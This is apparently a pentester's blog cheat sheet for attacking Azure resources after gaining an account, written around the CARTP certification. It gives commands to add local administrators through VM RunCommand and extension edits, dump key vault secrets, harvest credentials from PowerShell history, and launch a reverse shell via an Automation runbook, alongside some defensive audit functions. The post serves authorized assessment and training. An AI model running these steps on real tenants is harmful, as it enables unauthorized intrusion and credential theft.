# \[Azure] What To Do If?

{% hint style="info" %}
Last update: June, 29 2025
{% endhint %}

Hi there! In this blog, as its title suggests, we will answer the question **"What to do if you find resource XYZ in Azure?"** It's very simple and will be updated continuously with the latest commands, tools, and more. I used this guide to pass the **CARTP** (Certified Azure Red Team Professional) certification from Altered Security, so thanks to them, and especially to Nikhil, for the great content.

For example, if you have an assessment in an Azure environment and you gain access to a specific account or application managed identity, what's the first step you will take? What are you gonna do if you find yourself holding a specific role assignment on a virtual machine or key vault? Exactly, that's what we're gonna discuss here, so let's get started...

{% hint style="info" %}
All the following steps are circular, not sequential: if you log in, follow the steps, find leaked credentials and log in again as the new user, you may need to follow the same steps from the beginning again, depending on the resources you have.
{% endhint %}

***

## Content

1. Used Tools
2. Azure AD user account & Managed Identity
3. Virtual Machine & Extensions
4. KeyVaults
5. Storage Blob & Storage Accounts
6. Automation Account
7. SQL Server

***

### Used Tools

The tool we will depend on most is Az PowerShell, but we will use other tools for specific tasks, and we collect them here in one section.

<mark style="color:orange;">Az PowerShell</mark>

```powershell
Install-Module -Name Az -Scope CurrentUser -Repository PSGallery -Force
```

<mark style="color:orange;">Az CLI</mark>

Download and install it from [here](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli-windows?tabs=azure-cli).

***

### Azure AD user account & Managed Identity

This is your first step in any assessment: having an account or managed identity with specific roles. An Azure pentest is unlike a normal website pentest; it looks more like a configuration review than a red team engagement against an on-prem environment. So, once you get an account, do the following steps to learn your roles and the resources you have access to.

1. Login using Az PowerShell:

   ```powershell
   $passwd = ConvertTo-SecureString "pass@1234" -AsPlainText -Force
   $creds = New-Object System.Management.Automation.PSCredential ("test@aykalam.onmicrosoft.com", $passwd)
   Connect-AzAccount -Credential $creds
   ```

2. Or use Az CLI to login via the browser:

   ```bash
   az login
   ```

#### First Checks

Here we do quick checks to learn the resources, role assignments, owned objects, and more.

1. Run `Get-AzResource` to see the resources you have access to.
2. Run `Get-AzRoleAssignment` to see the roles you hold on a specific resource.
3. Check the objects owned by the user with the Az CLI: `az ad signed-in-user list-owned-objects`.
4. Check for storage accounts / blobs using the [MicroBurst scripts](https://github.com/NetSPI/MicroBurst/tree/master/Misc).
5. Try to log in to the Azure portal and check the deployment history.
6. Try to log in to the Azure portal and, if you have a *Dynamic Group*, try to invite other users.
7. If you can't log in to the Azure portal because of an access policy, try the following:

   * Log in using the Az CLI, Az PowerShell, or AzureAD tools instead.
   * Change the browser user-agent to another device type (the policy may only allow access from specific devices).
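As an added example (not from the original post), a small Az PowerShell helper that combines checks 1 and 2 above: it pulls the signed-in user's role assignments, including those inherited through group membership, and tags each scope with its resource type so you can see which section of this guide applies. The `$HighImpact` role list is my own choice of what to highlight, not an Azure-defined list, and the function assumes a user sign-in (for a managed identity, query by `-ObjectId` instead).

```powershell
# Added example: summarise the signed-in user's role assignments.
# Requires an existing Connect-AzAccount session (Az.Accounts + Az.Resources).
function Get-MyAccessSummary {
    [CmdletBinding()]
    param(
        # Roles worth a second look; assumed list, edit to taste.
        [string[]]$HighImpact = @(
            'Owner', 'Contributor', 'User Access Administrator',
            'Virtual Machine Contributor', 'Virtual Machine Command Executor',
            'Key Vault Administrator', 'Key Vault Secrets Officer', 'Key Vault Secrets User',
            'Storage Account Contributor', 'Storage Blob Data Contributor',
            'Automation Contributor', 'SQL Server Contributor'
        )
    )

    $account = (Get-AzContext).Account
    if (-not $account) { throw 'No Az context. Run Connect-AzAccount first.' }

    # -ExpandPrincipalGroups also returns assignments granted to groups the user belongs to.
    $assignments = Get-AzRoleAssignment -SignInName $account.Id -ExpandPrincipalGroups

    foreach ($a in $assignments) {
        # Derive the resource type from the scope path, e.g.
        # /subscriptions/.../providers/Microsoft.KeyVault/vaults/name -> Microsoft.KeyVault/vaults
        $type = switch -Regex ($a.Scope) {
            '/providers/([^/]+/[^/]+)'                     { $Matches[1]; break }
            '^/subscriptions/[^/]+/resourceGroups/[^/]+$'   { 'ResourceGroup'; break }
            '^/subscriptions/[^/]+$'                        { 'Subscription'; break }
            default                                         { 'Other' }
        }
        [pscustomobject]@{
            Scope        = $a.Scope
            ResourceType = $type
            Role         = $a.RoleDefinitionName
            ViaGroup     = ($a.ObjectType -eq 'Group')
            HighImpact   = ($HighImpact -contains $a.RoleDefinitionName)
        }
    }
}

# Usage: list the interesting assignments first
Get-MyAccessSummary | Sort-Object HighImpact -Descending | Format-Table -AutoSize
```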

***

### Virtual Machine & Extensions

<mark style="color:orange;">Check the VM network profile and IP</mark>

1. Run `Get-AzResource`.
2. Run `Get-AzRoleAssignment`; you need at least read access on the VM and its network profile.
3. From the output of the previous command, note the roles you hold on this VM to understand your permissions.
4. Get the network profile name: `Get-AzVM -Name VMName -ResourceGroupName RGName | select -ExpandProperty NetworkProfile`
5. Get the interface details: `Get-AzNetworkInterface -Name InterfaceName`
6. Get the public IP: `Get-AzPublicIpAddress -Name IPAddressName`

<mark style="color:orange;">If you have the Command Executor role (`Virtual Machine Command Executor`)</mark>

Run a ready-made script directly on the VM to add a local administrator:

```powershell
# Run a script file from your machine on the VM through the RunCommand feature
Invoke-AzVMRunCommand -VMName VMName -ResourceGroupName RGName -CommandId 'RunPowerShellScript' -ScriptPath 'C:\path\to\your\script' -Verbose

# Content of the script file: create a local user and add it to Administrators
$passwd = ConvertTo-SecureString "P@ssw0rd" -AsPlainText -Force
New-LocalUser -Name username -Password $passwd
Add-LocalGroupMember -Group Administrators -Member username
```

<mark style="color:orange;">Connect using the created account</mark>

```powershell
# Open a remote PowerShell session on the VM with the account created above
$password = ConvertTo-SecureString 'P@ssw0rd' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('username', $password)
$sess = New-PSSession -ComputerName 10.20.30.40 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession $sess

# After connecting, get the hostname and the local users of the machine
hostname
Get-LocalUser

# In case you find credentials on the machine, use them to authenticate to Azure
$password = ConvertTo-SecureString 'password' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('emailuser@ayhags.onmicrosoft.com', $password)
Connect-AzAccount -Credential $creds
```

<mark style="color:orange;">Extract credentials from console history (after gaining a shell)</mark>

```powershell
cat C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
```

<mark style="color:orange;">Check if there's any User Data stored in the machine (after gaining a shell)</mark>

```powershell
# Query the instance metadata service (IMDS) for user data; it is returned base64-encoded
$userData = Invoke-RestMethod -Headers @{"Metadata"="true"} -Method GET -Uri "http://169.254.169.254/metadata/instance/compute/userData?api-version=2021-01-01&format=text"
[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($userData))
```

<mark style="color:orange;">Try the PowerShell transcripts (after gaining a shell)</mark>

```powershell
cat C:\Transcripts\<id>\PowerShell_transcript.DESKTOP-M7C1AFM.6sZJrDuN.<id>.txt
```

<mark style="color:orange;">Dealing with **Extensions** if you have read or write permission</mark>

```powershell
# Check which extensions are installed on the VM
Get-AzVMExtension -ResourceGroupName "RGName" -VMName "VMName"

# We may be unable to create a new extension, but we can modify the "commandToExecute" of an existing one to add our own local user
Set-AzVMExtension -ResourceGroupName "RGName" -ExtensionName "ExecCmd" -VMName "VMName" -Location "Location" -Publisher Microsoft.Compute -ExtensionType CustomScriptExtension -TypeHandlerVersion 1.8 -SettingString '{"commandToExecute":"powershell net users <your-username> <password> /add /Y; net localgroup administrators <your-username> /add"}'
```
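From the defensive side, both `Invoke-AzVMRunCommand` and `Set-AzVMExtension` are control-plane operations that land in the subscription Activity Log. The following is an added example (not from the original post) that lists such events for one VM; the `$Days` default, the watched operation list and the output shape are my choices, and it assumes Az.Monitor and at least Reader on the resource group.

```powershell
# Added example: find RunCommand and extension changes for a VM in the Activity Log.
function Get-VMControlPlaneActivity {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$ResourceGroupName,
        [Parameter(Mandatory)][string]$VMName,
        [int]$Days = 7
    )

    # ARM operation names behind the two cmdlets used in this section
    $watched = @(
        'Microsoft.Compute/virtualMachines/runCommand/action',
        'Microsoft.Compute/virtualMachines/extensions/write',
        'Microsoft.Compute/virtualMachines/extensions/delete'
    )

    $vm    = Get-AzVM -ResourceGroupName $ResourceGroupName -Name $VMName
    $start = (Get-Date).AddDays(-$Days)

    # Extension events carry the extension's own resource id (vmId/extensions/name),
    # so match on the VM id as a prefix rather than on an exact id.
    Get-AzActivityLog -ResourceGroupName $ResourceGroupName -StartTime $start -WarningAction SilentlyContinue |
        Where-Object {
            $_.ResourceId -like "$($vm.Id)*" -and
            $watched -contains $_.OperationName.Value
        } |
        ForEach-Object {
            [pscustomobject]@{
                Time      = $_.EventTimestamp
                Operation = $_.OperationName.Value
                Caller    = $_.Caller
                Status    = $_.Status.Value
                Resource  = $_.ResourceId
            }
        } | Sort-Object Time -Descending
}

# Usage: newest events first; an unexpected Caller here is what you are looking for
Get-VMControlPlaneActivity -ResourceGroupName RGName -VMName VMName | Format-Table -AutoSize
```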

<mark style="color:orange;">If you find yourself on the Azure AD Connect machine (hybrid with on-prem AD), try to reset the Sync\_ account</mark>

```powershell
# Check if you are on the Azure AD Connect machine; the ADSync module is installed by default on any Connect server
Get-ADSyncConnector
```

***

### KeyVault

First, check whether you have access to any key vaults; if so, try to list their secrets and read them as plain text. It's very simple.

```powershell
# List the key vaults we have access to
Get-AzKeyVault
# Vault Name: ResearchKeyVault

# Dump the secret names from a specific vault
Get-AzKeyVaultSecret -VaultName ResearchKeyVault
# Name: researchkeyvault

# Read the secret value in plain text
Get-AzKeyVaultSecret -VaultName ResearchKeyVault -Name researchkeyvault -AsPlainText
# username: accountName@ayhags.onmicrosoft.com ; password:adfa@asdfa$#*!@#
```

```bash
# List all key vaults
az keyvault list --query "[].{Name:name, Location:location, URI:properties.vaultUri}" -o table

# Show the access policies
az keyvault show --name MYNAME --query properties.accessPolicies

# List keys, secrets and certificates
az keyvault secret list --vault-name MYNAME -o table
az keyvault key list --vault-name MYNAME -o table
az keyvault certificate list --vault-name MYNAME -o table

# Create and read a secret
az keyvault secret set --vault-name MYNAME --name "TestSecret" --value "Test123"
az keyvault secret show --vault-name MYNAME --name "TestSecret"

# If that succeeds, try to delete it (or any other secret), then recover it
az keyvault secret delete --vault-name MYNAME --name "TestSecret"
az keyvault secret list-deleted --vault-name MYNAME
az keyvault secret recover --vault-name MYNAME --name "TestSecret"

# Check soft delete and purge protection
az keyvault show --name MYNAME --query "properties.enableSoftDelete"
az keyvault show --name MYNAME --query "properties.enablePurgeProtection"
```
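An added example (not from the original post) that turns the manual checks above into one Az PowerShell function: it handles both permission models (classic access policies and Azure RBAC) and reports soft delete and purge protection alongside every principal that can read secrets. The secret-reading role list and the output fields are my choices; it assumes Az.KeyVault and Az.Resources and Reader on the vault.

```powershell
# Added example: who can read secrets from a vault, and is it protected against deletion?
function Get-KeyVaultExposure {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$VaultName)

    $kv = Get-AzKeyVault -VaultName $VaultName
    if (-not $kv) { throw "Vault '$VaultName' not found or not visible to this identity." }

    if ($kv.EnableRbacAuthorization) {
        # RBAC model: secret access comes from role assignments at or above the vault scope.
        $secretRoles = 'Owner', 'Key Vault Administrator', 'Key Vault Secrets Officer', 'Key Vault Secrets User'
        $readers = Get-AzRoleAssignment -Scope $kv.ResourceId |
            Where-Object { $secretRoles -contains $_.RoleDefinitionName } |
            ForEach-Object {
                [pscustomobject]@{ Principal = $_.DisplayName; Type = $_.ObjectType; Via = $_.RoleDefinitionName }
            }
    } else {
        # Access-policy model: anyone with Get, List or All on secrets can dump them as shown above.
        $readers = $kv.AccessPolicies |
            Where-Object { $_.PermissionsToSecrets -match '^(Get|List|All)$' } |
            ForEach-Object {
                [pscustomobject]@{ Principal = $_.DisplayName; Type = 'AccessPolicy'; Via = ($_.PermissionsToSecrets -join ',') }
            }
    }

    [pscustomobject]@{
        Vault           = $kv.VaultName
        Model           = if ($kv.EnableRbacAuthorization) { 'RBAC' } else { 'AccessPolicy' }
        SoftDelete      = [bool]$kv.EnableSoftDelete
        PurgeProtection = [bool]$kv.EnablePurgeProtection
        SecretReaders   = @($readers)
    }
}

# Usage
$report = Get-KeyVaultExposure -VaultName ResearchKeyVault
$report | Format-List
$report.SecretReaders | Format-Table -AutoSize
```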

***

### Storage Blob / Accounts

<mark style="color:orange;">Enumerate the storage blobs using `MicroBurst`</mark>

```powershell
. C:\AzAD\Tools\MicroBurst\Misc\Invoke-EnumerateAzureBlobs.ps1
Invoke-EnumerateAzureBlobs -Base <tenantName>
```

If you find a container, take the value from the `<Name></Name>` tag in the listing and append it to the container URL to access that object.

<mark style="color:orange;">Check Containers</mark>

If your user has access to the storage account, check whether there is a *container* the user can access.

```powershell
Get-AzResource
# Name: RName
# ResourceGroupName: RGName
# ResourceType: Microsoft.Storage/storageAccounts

# List the containers in the storage account
Get-AzStorageContainer -Context (New-AzStorageContext -StorageAccountName <SAName>)
# If you find a container, log in with the account you have to Storage Explorer via the Subscription tab
```

If you find a **SAS** URL or account credentials with access to Storage Blob, open the <mark style="color:blue;">**Storage Explorer**</mark> application and authenticate using the SAS URL or the account.

<mark style="color:orange;">Check the Storage Accounts using Az CLI</mark>

```bash
# This command shows the public access and HTTPS-only settings,
# the network rules in use,
# and the encryption and authentication configuration.
az storage account show --name MYNAME -o json | jq '{
  allowBlobPublicAccess,
  enableHttpsTrafficOnly,
  networkRuleSet: {
    defaultAction: .networkRuleSet.defaultAction,
    ipRules: .networkRuleSet.ipRules,
    virtualNetworkRules: .networkRuleSet.virtualNetworkRules
  },
  kind,
  encryption: {
    keySource: .encryption.keySource,
    blobEnabled: .encryption.services.blob.enabled
  },
  accessTier,
  allowSharedKeyAccess,
  azureFilesIdentityBasedAuthentication: .azureFilesIdentityBasedAuthentication
}'
```

***

### Automation Account

<mark style="color:orange;">Check your permissions over the automation account</mark>

```powershell
Get-AzRoleAssignment -Scope /subscriptions/<subscription-id>/resourceGroups/<RGName>/providers/Microsoft.Automation/automationAccounts/HybridAutomation
```

<mark style="color:orange;">Check if the hybrid worker is in use in the automation account</mark>

```powershell
Get-AzAutomationHybridWorkerGroup -AutomationAccountName HybridAutomation -ResourceGroupName AyKalam
# ResourceGroupName     : AyKalam
# AutomationAccountName : HybridAutomation
# Name                  : Workergroup1
# RunbookWorker         : {}
# GroupType             : User
```

<mark style="color:orange;">Gain reverse shell access</mark>

Import a PowerShell runbook that downloads a reverse shell from your host machine and runs it on the hybrid worker.

```powershell
# Import the runbook file
# filename.ps1 is any PowerShell reverse shell script
Import-AzAutomationRunbook -Name <RBName> -Path C:\Tools\filename.ps1 -AutomationAccountName HybridAutomation -ResourceGroupName AyKalam -Type PowerShell -Force -Verbose

# Publish the runbook
Publish-AzAutomationRunbook -RunbookName <RBName> -AutomationAccountName HybridAutomation -ResourceGroupName AyKalam -Verbose

# Run your netcat listener
nc.exe -lvp 4444

# Start the runbook on the hybrid worker group
Start-AzAutomationRunbook -RunbookName <RBName> -RunOn Workergroup1 -AutomationAccountName HybridAutomation -ResourceGroupName AyKalam -Verbose
```

***

### SQL Server

```bash
# Check the server's network exposure, TLS floor and Azure AD integration
az sql server show --name <server-name> --resource-group <rg-name> --query "{publicNetworkAccess:publicNetworkAccess, minimalTlsVersion:minimalTlsVersion, aadAdmin:administrators}" -o json
# publicNetworkAccess (should be Disabled in secure configs)
# minimalTlsVersion   (should be 1.2 or higher)
# aadAdmin            (Azure AD integration status)
```

***

To be continued...

**Thanks for reading <3 Stay in touch**

[LinkedIn](https://www.linkedin.com/in/eslam3kl/) | [GitHub](https://github.com/eslam3kl)

